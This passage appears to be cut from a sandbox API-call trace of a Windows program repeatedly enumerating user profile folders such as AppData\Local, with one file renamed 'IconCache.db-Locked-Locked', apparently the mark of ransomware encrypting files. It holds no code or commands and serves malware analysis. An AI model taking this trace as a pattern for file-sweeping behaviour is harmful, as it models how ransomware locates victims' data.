ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0311.491] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.492] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.492] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.492] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0311.492] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0311.493] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0311.493] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0311.493] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.493] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.493] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.493] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345fb549, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 1 [0311.494] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x4f14c05a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4f14c05a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LocalLow", cAlternateFileName="")) returned 1 [0311.494] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 1 [0311.494] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xb681b8a5, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0xb681b8a5, ftLastWriteTime.dwHighDateTime=0x1d7e78c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Roaming", cAlternateFileName="")) returned 0 [0311.494] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.494] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bf9193, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.494] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x345fb549, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bf9193, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37bf1ab7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x37bf1ab7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bf1ab7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db-Locked-Locked", cAlternateFileName="ICONCA~2.DB-")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe23fd35a, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xe23fd35a, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0311.495] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0311.496] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0311.496] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0311.496] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0311.496] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.496] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x37bf9193, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bf9193, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x37bf9193, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bf9193, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Comms", cAlternateFileName="")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History", cAlternateFileName="")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37bf1ab7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x37bf1ab7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x37bf1ab7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IconCache.db-Locked-Locked", cAlternateFileName="ICONCA~2.DB-")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3a17d745, ftLastAccessTime.dwHighDateTime=0x1d70699, ftLastWriteTime.dwLowDateTime=0x3a17d745, ftLastWriteTime.dwHighDateTime=0x1d70699, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4252734, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x4252734, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x4252734, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MicrosoftEdge", cAlternateFileName="MICROS~2")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x42cc0372, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x217bac55, ftLastAccessTime.dwHighDateTime=0x1d70503, ftLastWriteTime.dwLowDateTime=0x217bac55, ftLastWriteTime.dwHighDateTime=0x1d70503, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Packages", cAlternateFileName="")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x73f4dcd0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x73f4dcd0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x73f4dcd0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PeerDistRepub", cAlternateFileName="PEERDI~1")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xdc699b5c, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xdc699b5c, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xdc699b5c, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Publishers", cAlternateFileName="PUBLIS~1")) returned 1 [0311.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3cefc6a2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xe23fd35a, ftLastAccessTime.dwHighDateTime=0x1d8224f, ftLastWriteTime.dwLowDateTime=0xe23fd35a, ftLastWriteTime.dwHighDateTime=0x1d8224f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0311.498] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temporary Internet Files", cAlternateFileName="TEMPOR~1")) returned 1 [0311.498] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x40a64b1d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x40a64b1d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x40a64b1d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TileDataLayer", cAlternateFileName="TILEDA~1")) returned 1 [0311.498] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 1 [0311.498] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5599aefd, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x5599aefd, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x5599aefd, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VirtualStore", cAlternateFileName="VIRTUA~1")) returned 0 [0311.498] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.498] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Comms\\*", lpFindFileData=0x1aeef4 | out: lpFindFileData=0x1aeef4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x2397496d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x241f3052, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.499] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2397496d, 